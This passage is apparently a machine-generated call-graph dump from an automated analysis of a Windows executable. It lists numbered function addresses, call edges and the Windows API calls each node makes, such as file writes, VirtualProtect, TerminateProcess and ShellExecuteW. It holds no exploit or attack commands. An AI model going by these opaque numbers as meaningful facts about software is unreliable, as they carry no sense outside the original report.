7531d4 96375->96376 96378 7531ee messages 96375->96378 96377 716b57 22 API calls 96376->96377 96377->96378 96378->96370 96379 719cb3 22 API calls 96379->96381 96380 71515f 22 API calls 96380->96381 96381->96373 96381->96379 96381->96380 96382 714c6d 22 API calls 96381->96382 96382->96381 96383->96351 96385 751f50 __wsopen_s 96384->96385 96386 713364 GetFullPathNameW 96385->96386 96387 713386 96386->96387 96388 716b57 22 API calls 96387->96388 96389 7133a4 96388->96389 96389->96360 96390 71f7bf 96391 71f7d3 96390->96391 96392 71fcb6 96390->96392 96394 71fcc2 96391->96394 96395 72fddb 22 API calls 96391->96395 96484 71aceb 23 API calls messages 96392->96484 96485 71aceb 23 API calls messages 96394->96485 96397 71f7e5 96395->96397 96397->96394 96398 71f83e 96397->96398 96399 71fd3d 96397->96399 96416 71ed9d messages 96398->96416 96425 721310 96398->96425 96486 781155 22 API calls 96399->96486 96402 72fddb 22 API calls 96422 71ec76 messages 96402->96422 96403 71fef7 96409 71a8c7 22 API calls 96403->96409 96403->96416 96406 764600 96411 71a8c7 22 API calls 96406->96411 96406->96416 96407 764b0b 96488 78359c 82 API calls __wsopen_s 96407->96488 96409->96416 96411->96416 96413 71a8c7 22 API calls 96413->96422 96414 730242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96414->96422 96415 71fbe3 96415->96416 96418 764bdc 96415->96418 96424 71f3ae messages 96415->96424 96417 71a961 22 API calls 96417->96422 96489 78359c 82 API calls __wsopen_s 96418->96489 96420 764beb 96490 78359c 82 API calls __wsopen_s 96420->96490 96421 7300a3 29 API calls pre_c_initialization 96421->96422 96422->96402 96422->96403 96422->96406 96422->96407 96422->96413 96422->96414 96422->96415 96422->96416 96422->96417 96422->96420 96422->96421 96423 7301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96422->96423 96422->96424 96482 7201e0 207 API calls 2 library calls 96422->96482 96483 7206a0 41 API calls messages 96422->96483 96423->96422 96424->96416 96487 78359c 82 API calls __wsopen_s 96424->96487 96426 7217b0 96425->96426 96427 721376 96425->96427 96677 730242 5 API calls __Init_thread_wait 96426->96677 96428 721390 96427->96428 96429 766331 96427->96429 96491 721940 96428->96491 96612 79709c 96429->96612 96433 7217ba 96436 7217fb 96433->96436 96438 719cb3 22 API calls 96433->96438 96435 76633d 96435->96422 96440 766346 96436->96440 96442 72182c 96436->96442 96437 721940 9 API calls 96439 7213b6 96437->96439 96447 7217d4 96438->96447 96439->96436 96441 7213ec 96439->96441 96682 78359c 82 API calls __wsopen_s 96440->96682 96441->96440 96466 721408 __fread_nolock 96441->96466 96679 71aceb 23 API calls messages 96442->96679 96445 721839 96680 72d217 207 API calls 96445->96680 96446 766369 96446->96422 96678 7301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96447->96678 96450 76636e 96683 78359c 82 API calls __wsopen_s 96450->96683 96452 72152f 96453 7663d1 96452->96453 96454 72153c 96452->96454 96685 795745 54 API calls _wcslen 96453->96685 96455 721940 9 API calls 96454->96455 96457 721549 96455->96457 96461 7664fa 96457->96461 96463 721940 9 API calls 96457->96463 96458 72fddb 22 API calls 96458->96466 96459 721872 96681 72faeb 23 API calls 96459->96681 96460 72fe0b 22 API calls 96460->96466 96461->96446 96686 78359c 82 API calls __wsopen_s 96461->96686 96468 721563 96463->96468 96466->96445 96466->96446 96466->96450 96466->96452 96466->96458 96466->96460 96467 7663b2 96466->96467 96652 71ec40 96466->96652 96684 78359c 82 API calls __wsopen_s 96467->96684 96468->96461 96470 71a8c7 22 API calls 96468->96470 96472 7215c7 messages 96468->96472 96470->96472 96471 721940 9 API calls 96471->96472 96472->96446 96472->96459 96472->96461 96472->96471 96475 72167b messages 96472->96475 96501 79958b 96472->96501 96504 78f0ec 96472->96504 96513 78744a 96472->96513 96569 7883da 96472->96569 96572 716246 96472->96572 96576 79e204 96472->96576 96473 72171d 96473->96422 96475->96473 96676 72ce17 22 API calls messages 96475->96676 96482->96422 96483->96422 96484->96394 96485->96399 96486->96416 96487->96416 96488->96416 96489->96420 96490->96416 96492 721981 96491->96492 96497 72195d 96491->96497 96687 730242 5 API calls __Init_thread_wait 96492->96687 96495 72198b 96495->96497 96688 7301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96495->96688 96496 728727 96500 7213a0 96496->96500 96690 7301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96496->96690 96497->96500 96689 730242 5 API calls __Init_thread_wait 96497->96689 96500->96437 96691 797f59 96501->96691 96503 79959b 96503->96472 96505 717510 53 API calls 96504->96505 96506 78f126 96505->96506 96811 719e90 96506->96811 96508 78f15b 96512 78f15f 96508->96512 96839 719c6e 22 API calls 96508->96839 96509 78f136 96509->96508 96510 71ec40 207 API calls 96509->96510 96510->96508 96512->96472 96514 787469 96513->96514 96515 787474 96513->96515 96857 71b567 39 API calls 96514->96857 96518 71a961 22 API calls 96515->96518 96550 787554 96515->96550 96517 72fddb 22 API calls 96519 787587 96517->96519 96520 787495 96518->96520 96521 72fe0b 22 API calls 96519->96521 96522 71a961 22 API calls 96520->96522 96523 787598 96521->96523 96524 78749e 96522->96524 96525 716246 CloseHandle 96523->96525 96526 717510 53 API calls 96524->96526 96527 7875a3 96525->96527 96529 7874aa 96526->96529 96528 71a961 22 API calls 96527->96528 96530 7875ab 96528->96530 96858 71525f 22 API calls 96529->96858 96532 716246 CloseHandle 96530->96532 96534 7875b2 96532->96534 96533 7874bf 96535 716350 22 API calls 96533->96535 96536 717510 53 API calls 96534->96536 96537 7874f2 96535->96537 96539 7875be 96536->96539 96538 78754a 96537->96538 96859 77d4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 96537->96859 96861 71b567 39 API calls 96538->96861 96541 716246 CloseHandle 96539->96541 96544 7875c8 96541->96544 96543 787502 96543->96538 96545 787506 96543->96545 96849 715745 96544->96849 96546 719cb3 22 API calls 96545->96546 96548 787513 96546->96548 96860 77d2c1 26 API calls 96548->96860 96550->96517 96567 7876a4 96550->96567 96552 7875ea 96862 7153de 27 API calls messages 96552->96862 96553 7876de GetLastError 96554 7876f7 96553->96554 96869 716216 CloseHandle messages 96554->96869 96557 7875f8 96863 7153c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96557->96863 96558 78751c 96558->96538 96560 787645 96561 72fddb 22 API calls 96560->96561 96563 787679 96561->96563 96562 7875ff 96562->96560 96864 77ccff 96562->96864 96564 71a961 22 API calls 96563->96564 96566 787686 96564->96566 96566->96567 96868 77417d 22 API calls __fread_nolock 96566->96868 96567->96472 96872 7898e3 96569->96872 96571 7883ea 96571->96472 96573 716250 96572->96573 96574 71625f 96572->96574 96573->96472 96574->96573 96575 716264 CloseHandle 96574->96575 96575->96573 96577 71a961 22 API calls 96576->96577 96578 79e21b 96577->96578 96579 717510 53 API calls 96578->96579 96580 79e22a 96579->96580 96581 716270 22 API calls 96580->96581 96582 79e23d 96581->96582 96583 717510 53 API calls 96582->96583 96584 79e24a 96583->96584 96585 79e262 96584->96585 96586 79e2c7 96584->96586 96954 71b567 39 API calls 96585->96954 96587 717510 53 API calls 96586->96587 96589 79e2cc 96587->96589 96591 79e2d9 96589->96591 96592 79e314 96589->96592 96590 79e267 96590->96591 96593 79e280 96590->96593 96957 719c6e 22 API calls 96591->96957 96594 79e32c 96592->96594 96958 71b567 39 API calls 96592->96958 96955 716d25 22 API calls __fread_nolock 96593->96955 96598 79e345 96594->96598 96959 71b567 39 API calls 96594->96959 96601 71a8c7 22 API calls 96598->96601 96599 79e28d 96603 716350 22 API calls 96599->96603 96602 79e35f 96601->96602 96935 7792c8 96602->96935 96605 79e29b 96603->96605 96956 716d25 22 API calls __fread_nolock 96605->96956 96607 79e2b4 96608 716350 22 API calls 96607->96608 96611 79e2c2 96608->96611 96609 79e2e6 96609->96472 96960 7162b5 22 API calls 96611->96960 96613 7970db 96612->96613 96614 7970f5 96612->96614 96975 78359c 82 API calls __wsopen_s 96613->96975 96964 795689 96614->96964 96618 71ec40 206 API calls 96619 797164 96618->96619 96620 7971ff 96619->96620 96623 7971a6 96619->96623 96645 7970ed 96619->96645 96621 797253 96620->96621 96622 797205 96620->96622 96624 717510 53 API calls 96621->96624 96621->96645 96976 781119 22 API calls 96622->96976 96628 780acc 22 API calls 96623->96628 96626 797265 96624->96626 96629 71aec9 22 API calls 96626->96629 96627 797228 96977 71a673 22 API calls 96627->96977 96632 7971de 96628->96632 96630 797289 CharUpperBuffW 96629->96630 96635 7972a3 96630->96635 96634 721310 206 API calls 96632->96634 96633 797230 96978 71bf40 207 API calls 2 library calls 96633->96978 96634->96645 96636 7972aa 96635->96636 96637 7972f6 96635->96637 96971 780acc 96636->96971 96639 717510 53 API calls 96637->96639 96640 7972fe 96639->96640 96979 72e300 23 API calls 96640->96979 96644 721310 206 API calls 96644->96645 96645->96435 96646 797308 96646->96645 96647 717510 53 API calls 96646->96647 96648 797323 96647->96648 96980 71a673 22 API calls 96648->96980 96650 797333 96981 71bf40 207 API calls 2 library calls 96650->96981 96670 71ec76 messages 96652->96670 96653 730242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96653->96670 96654 7301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96654->96670 96655 72fddb 22 API calls 96655->96670 96656 71fef7 96662 71a8c7 22 API calls 96656->96662 96669 71ed9d messages 96656->96669 96659 764600 96665 71a8c7 22 API calls 96659->96665 96659->96669 96660 764b0b 96986 78359c 82 API calls __wsopen_s 96660->96986 96662->96669 96664 71a8c7 22 API calls 96664->96670 96665->96669 96667 71fbe3 96667->96669 96671 764bdc 96667->96671 96675 71f3ae messages 96667->96675 96668 71a961 22 API calls 96668->96670 96669->96466 96670->96653 96670->96654 96670->96655 96670->96656 96670->96659 96670->96660 96670->96664 96670->96667 96670->96668 96670->96669 96672 7300a3 29 API calls pre_c_initialization 96670->96672 96674 764beb 96670->96674 96670->96675 96983 7201e0 207 API calls 2 library calls 96670->96983 96984 7206a0 41 API calls messages 96670->96984 96987 78359c 82 API calls __wsopen_s 96671->96987 96672->96670 96988 78359c 82 API calls __wsopen_s 96674->96988 96675->96669 96985 78359c 82 API calls __wsopen_s 96675->96985 96676->96475 96677->96433 96678->96436 96679->96445 96680->96459 96681->96459 96682->96446 96683->96446 96684->96446 96685->96468 96686->96446 96687->96495 96688->96497 96689->96496 96690->96500 96729 717510 96691->96729 96695 798281 96696 79844f 96695->96696 96701 79828f 96695->96701 96793 798ee4 60 API calls 96696->96793 96699 79845e 96700 79846a 96699->96700 96699->96701 96717 797fd5 messages 96700->96717 96765 797e86 96701->96765 96702 717510 53 API calls 96719 798049 96702->96719 96707 7982c8 96780 72fc70 96707->96780 96710 7982e8 96786 78359c 82 API calls __wsopen_s 96710->96786 96711 798302 96787 7163eb 22 API calls 96711->96787 96714 7982f3 GetCurrentProcess TerminateProcess 96714->96711 96715 798311 96788 716a50 22 API calls 96715->96788 96717->96503 96718 79832a 96728 798352 96718->96728 96789 7204f0 22 API calls 96718->96789 96719->96695 96719->96702 96719->96717 96784 77417d 22 API calls __fread_nolock 96719->96784 96785 79851d 42 API calls _strftime 96719->96785 96721 7984c5 96721->96717 96723 7984d9 FreeLibrary 96721->96723 96722 798341 96790 798b7b 75 API calls 96722->96790 96723->96717 96728->96721 96791 7204f0 22 API calls 96728->96791 96792 71aceb 23 API calls messages 96728->96792 96794 798b7b 75 API calls 96728->96794 96730 717522 96729->96730 96731 717525 96729->96731 96730->96717 96752 798cd3 96730->96752 96732 71755b 96731->96732 96733 71752d 96731->96733 96735 7550f6 96732->96735 96738 71756d 96732->96738 96744 75500f 96732->96744 96795 7351c6 26 API calls 96733->96795 96798 735183 26 API calls 96735->96798 96736 71753d 96742 72fddb 22 API calls 96736->96742 96796 72fb21 51 API calls 96738->96796 96739 75510e 96739->96739 96743 717547 96742->96743 96745 719cb3 22 API calls 96743->96745 96746 72fe0b 22 API calls 96744->96746 96751 755088 96744->96751 96745->96730 96747 755058 96746->96747 96748 72fddb 22 API calls 96747->96748 96749 75507f 96748->96749 96750 719cb3 22 API calls 96749->96750 96750->96751 96797 72fb21 51 API calls 96751->96797 96753 71aec9 22 API calls 96752->96753 96754 798cee CharLowerBuffW 96753->96754 96799 778e54 96754->96799 96758 71a961 22 API calls 96759 798d2a 96758->96759 96806 716d25 22 API calls __fread_nolock 96759->96806 96761 798d3e 96762 7193b2 22 API calls 96761->96762 96764 798d48 _wcslen 96762->96764 96763 798e5e _wcslen 96763->96719 96764->96763 96807 79851d 42 API calls _strftime 96764->96807 96766 797ea1 96765->96766 96770 797eec 96765->96770 96767 72fe0b 22 API calls 96766->96767 96769 797ec3 96767->96769 96768 72fddb 22 API calls 96768->96769 96769->96768 96769->96770 96771 799096 96770->96771 96772 7992ab messages 96771->96772 96779 7990ba _strcat _wcslen 96771->96779 96772->96707 96773 71b6b5 39 API calls 96773->96779 96774 71b567 39 API calls 96774->96779 96775 71b38f 39 API calls 96775->96779 96776 717510 53 API calls 96776->96779 96777 73ea0c 21 API calls ___std_exception_copy 96777->96779 96779->96772 96779->96773 96779->96774 96779->96775 96779->96776 96779->96777 96810 77efae 24 API calls _wcslen 96779->96810 96781 72fc85 96780->96781 96782 72fd1d VirtualProtect 96781->96782 96783 72fceb 96781->96783 96782->96783 96783->96710 96783->96711 96784->96719 96785->96719 96786->96714 96787->96715 96788->96718 96789->96722 96790->96728 96791->96728 96792->96728 96793->96699 96794->96728 96795->96736 96796->96736 96797->96735 96798->96739 96800 778e74 _wcslen 96799->96800 96801 778f63 96800->96801 96803 778f68 96800->96803 96805 778ea9 96800->96805 96801->96758 96801->96764 96803->96801 96809 72ce60 41 API calls 96803->96809 96805->96801 96808 72ce60 41 API calls 96805->96808 96806->96761 96807->96763 96808->96805 96809->96803 96810->96779 96812 716270 22 API calls 96811->96812 96838 719eb5 96812->96838 96813 719fd2 96841 71a4a1 22 API calls __fread_nolock 96813->96841 96815 719fec 96815->96509 96818 75f7c4 96846 7796e2 84 API calls __wsopen_s 96818->96846 96819 75f699 96827 72fddb 22 API calls 96819->96827 96820 71a405 96820->96815 96848 7796e2 84 API calls __wsopen_s 96820->96848 96822 71a4a1 22 API calls 96822->96838 96825 71a6c3 22 API calls 96825->96838 96826 75f7d2 96847 71a4a1 22 API calls __fread_nolock 96826->96847 96829 75f754 96827->96829 96831 72fe0b 22 API calls 96829->96831 96830 75f7e8 96830->96815 96833 71a12c __fread_nolock 96831->96833 96833->96818 96833->96820 96834 71a587 22 API calls 96834->96838 96835 71aec9 22 API calls 96836 71a0db CharUpperBuffW 96835->96836 96842 71a673 22 API calls 96836->96842 96838->96813 96838->96818 96838->96819 96838->96820 96838->96822 96838->96825 96838->96833 96838->96834 96838->96835 96840 714573 41 API calls _wcslen 96838->96840 96843 7148c8 23 API calls 96838->96843 96844 7149bd 22 API calls __fread_nolock 96838->96844 96845 71a673 22 API calls 96838->96845 96839->96512 96840->96838 96841->96815 96842->96838 96843->96838 96844->96838 96845->96838 96846->96826 96847->96830 96848->96815 96850 754035 96849->96850 96851 71575c CreateFileW 96849->96851 96852 71577b 96850->96852 96853 75403b CreateFileW 96850->96853 96851->96852 96852->96552 96852->96553 96853->96852 96854 754063 96853->96854 96870 7154c6 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96854->96870 96856 75406e 96856->96852 96857->96515 96858->96533 96859->96543 96860->96558 96861->96550 96862->96557 96863->96562 96865 77cd0e 96864->96865 96866 77cd19 WriteFile 96864->96866 96871 77cc37 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96865->96871 96866->96560 96868->96567 96869->96567 96870->96856 96871->96866 96873 7899e8 96872->96873 96874 789902 96872->96874 96930 789caa 39 API calls 96873->96930 96876 72fddb 22 API calls 96874->96876 96878 789909 96876->96878 96877 7899a2 96879 7899ca 96877->96879 96882 789ac5 96877->96882 96888 789a33 96877->96888 96880 72fe0b 22 API calls 96878->96880 96879->96571 96881 78991a 96880->96881 96883 716246 CloseHandle 96881->96883 96923 781e96 96882->96923 96885 789925 96883->96885 96886 71a961 22 API calls 96885->96886 96889 78992d 96886->96889 96887 789acc 96893 77ccff 4 API calls 96887->96893 96891 717510 53 API calls 96888->96891 96890 716246 CloseHandle 96889->96890 96892 789934 96890->96892 96901 789a3a 96891->96901 96894 717510 53 API calls 96892->96894 96917 789aa8 96893->96917 96897 789940 96894->96897 96895 789abb 96932 77cd57 30 API calls 96895->96932 96899 716246 CloseHandle 96897->96899 96898 789a6e 96900 716270 22 API calls 96898->96900 96903 78994a 96899->96903 96904 789a7e 96900->96904 96901->96895 96901->96898 96902 716246 CloseHandle 96905 789b1e 96902->96905 96906 715745 5 API calls 96903->96906 96907 789a8e 96904->96907 96910 71a8c7 22 API calls 96904->96910 96933 716216 CloseHandle messages 96905->96933 96909 789959 96906->96909 96911 7133c6 22 API calls 96907->96911 96912 78995d 96909->96912 96913 7899c2 96909->96913 96910->96907 96914 789a9c 96911->96914 96927 7153de 27 API calls messages 96912->96927 96929 716216 CloseHandle messages 96913->96929 96931 77cd57 30 API calls 96914->96931 96917->96879 96917->96902 96919 78996b 96928 7153c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96919->96928 96921 789972 96921->96877 96922 77ccff 4 API calls 96921->96922 96922->96877 96924 781e9f 96923->96924 96925 781ea4 96923->96925 96934 780f67 24 API calls __fread_nolock 96924->96934 96925->96887 96927->96919 96928->96921 96929->96879 96930->96877 96931->96917 96932->96917 96933->96879 96934->96925 96936 71a961 22 API calls 96935->96936 96937 7792de 96936->96937 96938 716270 22 API calls 96937->96938 96939 7792f2 96938->96939 96940 778e54 41 API calls 96939->96940 96946 779314 96939->96946 96941 77930e 96940->96941 96941->96946 96961 716d25 22 API calls __fread_nolock 96941->96961 96942 778e54 41 API calls 96942->96946 96945 716350 22 API calls 96945->96946 96946->96942 96946->96945 96947 7793b3 96946->96947 96950 779397 96946->96950 96962 716d25 22 API calls __fread_nolock 96946->96962 96948 7793c2 96947->96948 96949 71a8c7 22 API calls 96947->96949 96948->96611 96949->96948 96963 716d25 22 API calls __fread_nolock 96950->96963 96952 7793a7 96953 716350 22 API calls 96952->96953 96953->96947 96954->96590 96955->96599 96956->96607 96957->96609 96958->96594 96959->96598 96960->96609 96961->96946 96962->96946 96963->96952 96965 7956a4 96964->96965 96966 7956f2 96964->96966 96967 72fe0b 22 API calls 96965->96967 96966->96618 96969 7956c6 96967->96969 96968 72fddb 22 API calls 96968->96969 96969->96966 96969->96968 96982 780a59 22 API calls 96969->96982 96972 780ada 96971->96972 96974 780b13 96971->96974 96973 72fddb 22 API calls 96972->96973 96972->96974 96973->96974 96974->96644 96975->96645 96976->96627 96977->96633 96978->96645 96979->96646 96980->96650 96981->96645 96982->96969 96983->96670 96984->96670 96985->96669 96986->96669 96987->96674 96988->96669 96989 752ba5 96990 712b25 96989->96990 96991 752baf 96989->96991 97017 712b83 7 API calls 96990->97017 96992 713a5a 24 API calls 96991->96992 96994 752bb8 96992->96994 96997 719cb3 22 API calls 96994->96997 96999 752bc6 96997->96999 96998 712b2f 97000 712b44 96998->97000 97003 713837 49 API calls 96998->97003 97001 752bf5 96999->97001 97002 752bce 96999->97002 97007 712b5f 97000->97007 97021 7130f2 Shell_NotifyIconW ___scrt_fastfail 97000->97021 97005 7133c6 22 API calls 97001->97005 97004 7133c6 22 API calls 97002->97004 97003->97000 97006 752bd9 97004->97006 97015 752bf1 GetForegroundWindow ShellExecuteW 97005->97015 97008 716350 22 API calls 97006->97008 97014 712b66 SetCurrentDirectoryW 97007->97014 97011 752be7 97008->97011 97013 7133c6 22 API calls 97011->97013 97012 752c26 97012->97007 97013->97015 97016 712b7a 97014->97016 97015->97012 97022 712cd4 7 API calls 97017->97022 97019 712b2a 97020 712c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97019->97020 97020->96998 97021->97007 97022->97019 97023 712de3 97024 712df0 __wsopen_s 97023->97024 97025 712e09 97024->97025 97026 752c2b ___scrt_fastfail 97024->97026 97027 713aa2 23 API calls 97025->97027 97029 752c47 GetOpenFileNameW 97026->97029 97028 712e12 97027->97028 97039 712da5 97028->97039 97030 752c96 97029->97030 97032 716b57 22 API calls 97030->97032 97034 752cab 97032->97034 97034->97034 97036 712e27 97057 7144a8 97036->97057 97040 751f50 __wsopen_s 97039->97040 97041 712db2 GetLongPathNameW 97040->97041 97042 716b57 22 API calls 97041->97042 97043 712dda 97042->97043 97044 713598 97043->97044 97045 71a961 22 API calls 97044->97045 97046 7135aa 97045->97046 97047 713aa2 23 API calls 97046->97047 97048 7135b5 97047->97048 97049 7135c0 97048->97049 97050 7532eb 97048->97050 97051 71515f 22 API calls 97049->97051 97055 75330d 97050->97055 97093 72ce60 41 API calls 97050->97093 97053 7135cc 97051->97053 97087 7135f3 97053->97087 97056 7135df 97056->97036 97058 714ecb 94 API calls 97057->97058 97059 7144cd 97058->97059 97060 753833 97059->97060 97062 714ecb 94 API calls 97059->97062 97061 782cf9 80 API calls 97060->97061 97063 753848 97061->97063 97064 7144e1 97062->97064 97065 75384c 97063->97065 97066 753869 97063->97066 97064->97060 97067 7144e9 97064->97067 97068 714f39 68 API calls 97065->97068 97069 72fe0b 22 API calls 97066->97069 97070 753854 97067->97070 97071 7144f5 97067->97071 97068->97070 97078 7538ae 97069->97078 97104 77da5a 82 API calls 97070->97104 97103 71940c 136 API calls 2 library calls 97071->97103 97074 712e31 97075 753862 97075->97066 97076 753a5f 97080 753a67 97076->97080 97077 714f39 68 API calls 97077->97080 97078->97076 97078->97080 97084 719cb3 22 API calls 97078->97084 97094 77967e 97078->97094 97097 780b5a 97078->97097 97105 7795ad 42 API calls _wcslen 97078->97105 97106 71a4a1 22 API calls __fread_nolock 97078->97106 97107 713ff7 22 API calls 97078->97107 97080->97077 97108 77989b 82 API calls __wsopen_s 97080->97108 97084->97078 97088 713605 97087->97088 97092 713624 __fread_nolock 97087->97092 97091 72fe0b 22 API calls 97088->97091 97089 72fddb 22 API calls 97090 71363b 97089->97090 97090->97056 97091->97092 97092->97089 97093->97050 97095 72fe0b 22 API calls 97094->97095 97096 7796ae __fread_nolock 97095->97096 97096->97078 97096->97096 97098 780b65 97097->97098 97099 72fddb 22 API calls 97098->97099 97100 780b7c 97099->97100 97101 719cb3 22 API calls 97100->97101 97102 780b87 97101->97102 97102->97078 97103->97074 97104->97075 97105->97078 97106->97078 97107->97078 97108->97080 97109 71dee5 97112 71b710 97109->97112 97113 71b72b 97112->97113 97114 760146 97113->97114 97115 7600f8 97113->97115 97136 71b750 97113->97136 97154 7958a2 207 API calls 2 library calls 97114->97154 97119 760102 97115->97119 97122 76010f 97115->97122 97115->97136 97117 71ba20 97131 71ba4e 97117->97131 97158 78359c 82 API calls __wsopen_s 97117->97158 97152 795d33 207 API calls 97119->97152 97122->97117 97153 7961d0 207 API calls 2 library calls 97122->97153 97125 7603d9 97125->97125 97127 71bbe0 40 API calls 97127->97136 97129 72d336 40 API calls 97129->97136 97132 760322 97157 795c0c 82 API calls 97132->97157 97136->97117 97136->97127 97136->97129 97136->97131 97136->97132 97140 71ec40 207 API calls 97136->97140 97141 71a8c7 22 API calls 97136->97141 97143 71a81b 41 API calls 97136->97143 97144 72d2f0 40 API calls 97136->97144 97145 72a01b 207 API calls 97136->97145 97146 730242 5 API calls __Init_thread_wait 97136->97146 97147 72edcd 22 API calls 97136->97147 97148 7300a3 29 API calls __onexit 97136->97148 97149 7301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97136->97149 97150 72ee53 82 API calls 97136->97150 97151 72e5ca 207 API calls 97136->97151 97155 71aceb 23 API calls messages 97136->97155 97156 76f6bf 23 API calls 97136->97156 97140->97136 97141->97136 97143->97136 97144->97136 97145->97136 97146->97136 97147->97136 97148->97136 97149->97136 97150->97136 97151->97136 97152->97122 97153->97117 97154->97136 97155->97136 97156->97136 97157->97117 97158->97125 97159 711044 97164 7110f3 97159->97164 97161 71104a 97200 7300a3 29 API calls __onexit 97161->97200 97163 711054 97201 711398 97164->97201 97168 71116a 97169 71a961 22 API calls 97168->97169 97170 711174 97169->97170 97171 71a961 22 API calls 97170->97171 97172 71117e 97171->97172 97173 71a961 22 API calls 97172->97173 97174 711188 97173->97174 97175 71a961 22 API calls 97174->97175 97176 7111c6 97175->97176 97177 71a961 22 API calls 97176->97177 97178 711292 97177->97178 97211 71171c 97178->97211 97182 7112c4 97183 71a961 22 API calls 97182->97183 97184 7112ce 97183->97184 97185 721940 9 API calls 97184->97185 97186 7112f9 97185->97186 97232 711aab 97186->97232 97188 711315 97189 711325 GetStdHandle 97188->97189 97190 752485 97189->97190 97191 71137a 97189->97191 97190->97191 97192 75248e 97190->97192 97195 711387 OleInitialize 97191->97195 97193 72fddb 22 API calls 97192->97193 97194 752495 97193->97194 97239 78011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97194->97239 97195->97161 97197 75249e 97240 780944 CreateThread 97197->97240 97199 7524aa CloseHandle 97199->97191 97200->97163 97241 7113f1 97201->97241 97204 7113f1 22 API calls 97205 7113d0 97204->97205 97206 71a961 22 API calls 97205->97206 97207 7113dc 97206->97207 97208 716b57 22 API calls 97207->97208 97209 711129 97208->97209 97210 711bc3 6 API calls 97209->97210 97210->97168 97212 71a961 22 API calls 97211->97212 97213 71172c 97212->97213 97214 71a961 22 API calls 97213->97214 97215 711734 97214->97215 97216 71a961 22 API calls 97215->97216 97217 71174f 97216->97217 97218 72fddb 22 API calls 97217->97218 97219 71129c 97218->97219 97220 711b4a 97219->97220 97221 711b58 97220->97221 97222 71a961 22 API calls 97221->97222 97223 711b63 97222->97223 97224 71a961 22 API calls 97223->97224 97225 711b6e 97224->97225 97226 71a961 22 API calls 97225->97226 97227 711b79 97226->97227 97228 71a961 22 API calls 97227->97228 97229 711b84 97228->97229 97230 72fddb 22 API calls 97229->97230 97231 711b96 RegisterWindowMessageW 97230->97231 97231->97182 97233 75272d 97232->97233 97234 711abb 97232->97234 97248 783209 23 API calls 97233->97248 97236 72fddb 22 API calls 97234->97236 97238 711ac3 97236->97238 97237 752738 97238->97188 97239->97197 97240->97199 97249 78092a 28 API calls 97240->97249 97242 71a961 22 API calls 97241->97242 97243 7113fc 97242->97243 97244 71a961 22 API calls 97243->97244 97245 711404 97244->97245 97246 71a961 22 API calls 97245->97246 97247 7113c6 97246->97247 97247->97204 97248->97237 97250 762a00 97265 71d7b0 messages 97250->97265 97251 71db11 PeekMessageW 97251->97265 97252 71d807 GetInputState 97252->97251 97252->97265 97253 761cbe TranslateAcceleratorW 97253->97265 97255 71db8f PeekMessageW 97255->97265 97256 71da04 timeGetTime 97256->97265 97257 71db73 TranslateMessage DispatchMessageW 97257->97255 97258 71dbaf Sleep 97278 71dbc0 97258->97278 97259 762b74 Sleep 97259->97278 97260 72e551 timeGetTime 97260->97278 97261 761dda timeGetTime 97314 72e300 23 API calls 97261->97314 97264 762c0b GetExitCodeProcess 97269 762c37 CloseHandle 97264->97269 97270 762c21 WaitForSingleObject 97264->97270 97265->97251 97265->97252 97265->97253 97265->97255 97265->97256 97265->97257 97265->97258 97265->97259 97265->97261 97266 71d9d5 97265->97266 97277 71ec40 207 API calls 97265->97277 97279 721310 207 API calls 97265->97279 97282 71dd50 97265->97282 97289 71dfd0 97265->97289 97312 71bf40 207 API calls 2 library calls 97265->97312 97313 72edf6 IsDialogMessageW GetClassLongW 97265->97313 97315 783a2a 23 API calls 97265->97315 97316 78359c 82 API calls __wsopen_s 97265->97316 97267 7a29bf GetForegroundWindow 97267->97278 97269->97278 97270->97265 97270->97269 97271 762a31 97271->97266 97272 762ca9 Sleep 97272->97265 97277->97265 97278->97260 97278->97264 97278->97265 97278->97266 97278->97267 97278->97271 97278->97272 97317 795658 23 API calls 97278->97317 97318 77e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97278->97318 97319 77d4dc 47 API calls 97278->97319 97279->97265 97283 71dd6f 97282->97283 97284 71dd83 97282->97284 97320 71d260 207 API calls 2 library calls 97283->97320 97321 78359c 82 API calls __wsopen_s 97284->97321 97287 71dd7a 97287->97265 97288 762f75 97288->97288 97290 71e010 97289->97290 97307 71e0dc messages 97290->97307 97324 730242 5 API calls __Init_thread_wait 97290->97324 97293 762fca 97295 71a961 22 API calls 97293->97295 97293->97307 97294 71a961 22 API calls 97294->97307 97298 762fe4 97295->97298 97325 7300a3 29 API calls __onexit 97298->97325 97300 762fee 97326 7301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97300->97326 97304 71ec40 207 API calls 97304->97307 97305 71a8c7 22 API calls 97305->97307 97306 7204f0 22 API calls 97306->97307 97307->97294 97307->97304 97307->97305 97307->97306 97308 71e3e1 97307->97308 97309 78359c 82 API calls 97307->97309 97322 71a81b 41 API calls 97307->97322 97323 72a308 207 API calls 97307->97323 97327 730242 5 API calls __Init_thread_wait 97307->97327 97328 7300a3 29 API calls __onexit 97307->97328 97329 7301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97307->97329 97330 7947d4 207 API calls 97307->97330 97331 7968c1 207 API calls 97307->97331 97308->97265 97309->97307 97312->97265 97313->97265 97314->97265 97315->97265 97316->97265 97317->97278 97318->97278 97319->97278 97320->97287 97321->97288 97322->97307 97323->97307 97324->97293 97325->97300 97326->97307 97327->97307 97328->97307 97329->97307 97330->97307 97331->97307 97332 748402 97337 7481be 97332->97337 97335 74842a 97342 7481ef try_get_first_available_module 97337->97342 97339 7483ee 97356 7427ec 26 API calls __wsopen_s 97339->97356 